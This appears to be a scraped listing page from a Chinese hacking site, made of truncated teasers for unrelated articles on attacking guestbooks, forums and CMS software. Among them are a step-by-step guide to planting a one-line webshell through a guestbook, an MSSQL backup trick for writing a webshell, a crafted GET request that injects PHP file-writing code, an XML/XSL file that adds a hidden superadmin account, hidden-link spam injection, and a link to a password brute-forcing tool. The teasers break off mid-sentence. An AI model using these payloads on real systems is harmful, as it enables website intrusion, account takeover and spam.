其他

微軟在去年發布了MSIE DHTML Edit控制項跨站指令碼漏洞，但是圈內一直沒有公布出好用的EXP，害得一幫新手叫苦不迭，別急，這不是為大家送來了大餐嗎？！ [受影響系統]Microsoft Internet Explorer 6.0- Microsoft Windows XP Professional SP1- Microsoft Windows XP Professional- Microsoft Windows XP Home SP1- Microsoft Windows XP

作者：天狼星拒絕愛 這個是一個動畫，因為利用過程很簡單，所以我給大家簡單的說一下 首先進入 http://www.baidu.com 或者http://www.google.com 搜尋關鍵詞：Etp Flash 留言本 v1.5 搜尋到留言本，可以留言了 留言內容寫一句話木馬，選擇提交留言`` 儲存成功！ 恩``串連吧``這樣一個WEBSHELL就得到了 汗！我搜尋了下，看來搞破壞的還很多

本文是我通過網上收集整理。若有漏洞和不全面的地方還請多多指教！google hacking其實並算不上什麼新東西,當時並沒有重視這種技術,認為webshell什麼的,並無太大實際用途.google hacking其實並非 如此簡單... google hacking的簡單實現使用google中的一些文法可以提供給我們更多的資訊(當然也提供給那些習慣攻擊的人更多他們所想要的.),下面就來介紹一些常用的文法.intext:這個就是把網頁中的本文內容中的某個字元做為搜尋條件.例如在google裡輸入:

本人在第10期上的黑防刊登了桃源網路硬碟相關的漏洞後。馬上就通知了桃源官方修複了相關漏洞。近日，下班後無聊，就重新下載了桃源網路硬碟的最新版本2.5進行全面檢測。發現雖然修補了用“.”，另存、下載其網站的設定檔及資料庫等漏洞。但用其它的方法作了個測試後發現，汗。還是存在相關漏洞，還有就是可以構造代碼，任意查看網路硬碟所有檔案的原始碼及設定檔和資料庫。好的，轉入正題吧。為了給大家給個真實的視覺效應，特意在官方詳細測試。第一就是上傳漏洞，在這裡官方已經換上了最新版本的V2.5了。所在用“.”來突破的

目前的oblog、動易、風訊等一系列著名的系統，都存在源碼編輯漏洞。 具體操作是： 1，進入"源碼"編輯 2，輸入階段公分四段： 第一段：<此處輸入本文，做事需要手下留情嘛，來點實際內容>第二段：<script>document.write('<div style="display:none">');</script>第三段：<此處輸入作弊連結，擷取google的pr值，此處的內容將不會被瀏覽者看

首先先聲明這個文章是寫給菜鳥朋友看的 .現在注入橫飛！工具一大堆，過去手工注入的時代已經不複存在！代之的是NBSI HDSI

phpBB 2.0.18 XSS and Full Path Disclosure Details: SecurityAlert 還有一個是暴力破解的工具，單線程的， 也沒有大用處,實在情敵開了個什麼phpbb什麼的也可以拿來跑密碼 下載:http://ftpzhangxue.w205.100dns.com/tools/phpbb.rar Topic : phpBB 2.0.18 XSS and Full Path Disclosure SecurityAlert Id :

減少備份檔案大小，得到可執行檔webshell成功率提高不少,一利用差異備份加一個參數WITH DIFFERENTIAL declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s create table [dbo].[xiaolu] ([cmd] [image]); insert into

看到網上有類似的工具，但分析的文章卻沒找到，聽小黑說駭客手冊上有，可惜偶沒有雜誌，所以就抓包然後看下代碼，大致分析了一下。這個漏洞很巧妙、也很經典 ：） GET /search.php?keyword=By%20CN911&cachefile=an85.php%2500&treadinfo=〈?fputs(fop en(chr(46).chr(47).chr(46).chr(46).chr(47).chr(46).chr(46).chr(47).chr(98).chr(9

用法：把swords.xml和swords.xsl放在一個普通空間，相信很少人會注意xml的安全性吧，嘎嘎，只要把你想啟動並執行程式添加到run() 即可，預設支援js和vbs.這個程式加了一個使用者為 swords，密碼為est的超級管理員帳號。swords.xml<?xml version="1.0" encoding="GB2312"?><?xml-stylesheet type="text/xsl"

本文已經發表於《駭客手冊》（非安全）雜誌上，著作權歸其所有！轉載注名！ 其實ASP論壇中，我最喜歡就是leadbbs，穩定、速度快，占的空間也不大，比起龐大的DVBBS可小多了，說起安全來，它也很不錯的，雖然在早版本裡有過可以修改管理員密碼的漏洞（俗稱移花接木），但是從那至今它的安全性還是非常可以讓大家肯定的，可能你會說前幾天開始鬧cookie欺騙漏洞呢，但是這最多也只是進了前台，後台一般還是無能為力的，高手在其面前也不得不服啊。呵呵，上面是題外話，今天我不是詳說它安全性的，{www.xker.

===============================================僅以此文送給我的好友Bytes,並祝他和他的女友璐子能夠真的相愛一生，白頭偕老=============================================== 前言：我在和很多網管談到WEB安全的時候，很多人告訴我WEB安全就是sql injection,“不就是在一個變數後面嵌入你的sql語句麼，這個我也會”，這是我聽到最多的人們對WEB安全的認識，WEB安全難道僅僅是sql

首先開啟www.google.com在輸入Po......bBsxp5.15有很多這樣的論壇，隨便點個，好就這個bbs.yuntea.com 真幸運，這個站還沒打上補丁，一口做氣殺到底，bbsxp5.15最新漏洞 ,漏洞主要出在BLOG.ASP

ps：鬱悶納，一個整形變數，為什麼不做一強制轉換呢！ 看過第六輪黑防實驗室的兩位大俠對Oblog3.0 Access版本的滲透過程，敬佩之情猶如滔滔江水連綿不絕，又如黃河之水一發而不可收拾，尤其是他們把社交工程學原理利用得淋漓盡致，以及巧妙的後台上傳shell的方法。佩服，佩服。說了這麼多廢話，我們進入正題，本人在通讀Oblog3.0代碼的時候發現user_blogmanage.asp檔案存在安全隱患，看看下面移動blog日誌的作業碼：sub moveblog()if id=""

文章作者：喜歡憂傷資訊來源：邪惡八進位安全小組 背景：dvbbs7.1在後台備份裡面加了access資料庫檢查了.所以原來的gif圖片恢複成後門已經不行了 解決辦法：我把asp木馬插入到資料庫裡，然後恢複。這樣肯定檢查肯定可以通過的。 具體過程：前提：(偶以預設的安裝情況為準，具體情況的把握靠自己了.)你得到論壇dvbbs7.1後台。

適合讀者：漏洞分析員、黑迷 前置知識：溢出漏洞基本調試步驟、Softice基本使用方法 WTF：Windows XP SP2相信是大家都在關注的一個系統，這個版本剛推出的時候，由於其具有溢出保護機制，傳統的溢出利用方式已經不行了，它也因此而備受青睞。記得當時同行們也開始嘀咕著是否還有繼續研究溢出漏洞利用技術的必要。但是隨著時間的推移，XP SP2也慢慢暴露出與以前的作業系統版本存在的相容性問題，比如，有的軟體在Windows 2000或XP SP0、SP1上能正常使用，在SP2上卻不行；XP

今天發現這個站，先給大家送點見面禮：*** 大量使用的作弊手段！ 先來看他在 _blank>http://www.***.net/ 首頁的代碼，其中包含這一段（版主已編輯）： <div id="Layer_link" style="position:absolute; left:19px; top:383px; width:949px; height:63px; z-index:1; visibility: hidden;"> <a href="

理解這個漏洞呢，首先要瞭解一下線上支付的流程，這裡引用一下雲網官方的流程圖： 正常的線上支付過程呢，是從第一步到第六步！ 而這個漏洞所出現的地方就是在第二步，然後繞過了第三步和第四步、第五步，而直接把返回資訊提交給了支付成功返回頁面！ 我們在動畫裡也只是看到了！它只有一個提交頁面和網站上的一個支付成功頁面，根本沒有通過網關進行支付操作，所以錢也就沒進入到銀行裡，這裡也就不存在什麼影響銀行安全什麼了，純粹是騙人的了！

桃源留言本是桃源工作室http://www.mytaoyuan.com/開發的一個asp留言系統。由於桃源留言本介面清新，功能強大，簡潔適用，所以被一些大大小小的網站所採用，受到許多站長的好評。桃源留言本由原來的2.0版，升級到現在的3.0版。其官方網站也是3.0版。前段時間，我在入侵我們學校的網站的時候，發現了一個部門的網站上有這個留言本。於是引起了我對它的一番研究，我下載了各個版本的原始碼，讀了部分代碼之後，發現漏洞還真不少。 　　　　　　　　　　　　　 一.上傳漏洞 我在網上搜尋的時候，

在6月份的黑防上看到《動網7.1漏洞驚現江湖》一文，說是admin_postings.asp檔案存在注入漏洞，但利用的前提是擁有超級版主或前台管理員權限。我想起以前發現的動網7.x版本存在一個前台許可權提升漏洞， 正好可以結合起來利用。這個前台許可權提升漏洞對7.x的Ａccess和 SQL版都有效。下面我們就以7.0 SP2